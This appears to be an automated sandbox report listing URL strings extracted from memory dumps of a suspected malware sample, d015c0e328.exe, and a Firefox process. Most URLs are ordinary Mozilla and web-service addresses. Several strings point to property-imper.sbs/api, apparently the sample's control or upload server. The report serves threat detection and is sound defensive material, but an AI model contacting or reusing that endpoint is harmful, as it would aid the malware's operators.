Source: d015c0e328.exe, 0000000A.00000003.2836656383.0000000001654000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2710867732.0000000001653000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2745481964.0000000001656000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2779399309.0000000000560000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2779060726.000000000054A000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2779637846.0000000000561000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2778454117.0000000000546000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apid
Source: d015c0e328.exe, 00000007.00000003.2798934875.0000000001131000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000002.2905216851.0000000001128000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2693329851.000000000112A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apie
Source: d015c0e328.exe, 00000016.00000003.2747176932.0000000000549000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2747587637.0000000000560000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apik
Source: d015c0e328.exe, 00000007.00000003.2797016567.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiu
Source: d015c0e328.exe, 00000007.00000003.2486481413.00000000059F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/j
Source: d015c0e328.exe, 00000007.00000003.2539848625.00000000011AD000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2539786795.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/p
Source: d015c0e328.exe, 00000007.00000003.2799971962.0000000001111000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840231634.00000000015B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api
Source: d015c0e328.exe, 0000000A.00000003.2840231634.00000000015B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api0
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5B3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/experiments/screenshots/api.js
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comPV
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.commedia.autoplay.blocking_policytestPermissionFromPrincipalbrowser.migr
Source: firefox.exe, 00000019.00000002.2934623344.00000209A9270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5B3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.2934623344.00000209A9280000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5B3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2Deferred
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2https://
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svgwebcompat-reporter
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000019.00000002.2916177272.00000209A895B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3030128647.00000209AFD40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000019.00000002.3040511865.00000209B008F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000019.00000003.2724088412.00000209AB7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userpreffedRegionsBlockString
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userpreffedRegionsBlockStringgetValue/preffedBlockRegions
Source: firefox.exe, 00000019.00000002.2894451888.00000209A855F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsUnexpected
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: d015c0e328.exe, 00000007.00000003.2457329723.0000000005A52000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584518117.0000000005D92000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2686767650.00000000053DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000019.00000002.2963487324.00000209AA2A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: d015c0e328.exe, 00000016.00000003.2752859733.00000000054A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000019.00000002.3000812741.00000209AB105000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsgetCanApplyUpdates
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesInternalTestingProfileMigra
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationThe
Source: d015c0e328.exe, 00000016.00000003.2752859733.00000000054A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: d015c0e328.exe, 00000007.00000003.2457329723.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2486562795.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2486770595.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2486345377.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584626165.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2611246488.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584518117.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2611022364.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2716485397.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2715235535.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2687503121.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2686767650.00000000053DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: d015c0e328.exe, 00000007.00000003.2457473605.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584626165.0000000005D64000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2687503121.00000000053B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: d015c0e328.exe, 00000007.00000003.2457329723.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2486562795.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2486770595.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2486345377.0000000005A49000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584626165.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2611246488.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584518117.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2611022364.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2716485397.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2715235535.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2687503121.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2686767650.00000000053DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: d015c0e328.exe, 00000007.00000003.2457473605.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584626165.0000000005D64000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2687503121.00000000053B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.combrowser.urlbar.openViewOnFocusgeckoprofiler
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2712404213.00000209AFF73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000019.00000003.2728645310.00000209A8464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000019.00000002.2991507780.00000209AA355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: d015c0e328.exe, 00000016.00000003.2754496805.0000000000546000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2804534100.00000209A34AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000019.00000002.2916177272.00000209A89AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000019.00000002.3014477171.00000209AB77B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://31bc1824-4b8f-4b01-9a19-e1bd57d39
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: d015c0e328.exe, 00000016.00000003.2754496805.0000000000546000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2804534100.00000209A34AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000019.00000002.2928881374.00000209A8F52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000019.00000002.2928881374.00000209A8F89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000019.00000002.3052548159.00000209B0303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000019.00000003.2728645310.00000209A8464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search6491a2b8-c487-4798-a817-a0fd08b40ee2c0b26c0e-63e6-4235-b2ce-5f
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3DD6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServiceList
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000019.00000003.2728645310.00000209A8464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchimages/duckduckgo-com
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000019.00000003.2728645310.00000209A8464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000019.00000003.2728645310.00000209A8464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/bound
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3DAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: d015c0e328.exe, 00000016.00000003.2752859733.00000000054A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2729096941.00000209A9185000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2731455941.00000209A930D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: d015c0e328.exe, 00000016.00000003.2752859733.00000000054A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: d015c0e328.exe, 00000007.00000003.2511775357.0000000005B11000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2647615731.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2752859733.00000000054A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: d015c0e328.exe, 00000016.00000003.2752859733.00000000054A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarPrefs.sys.mjsresource://gre/modules/Ke
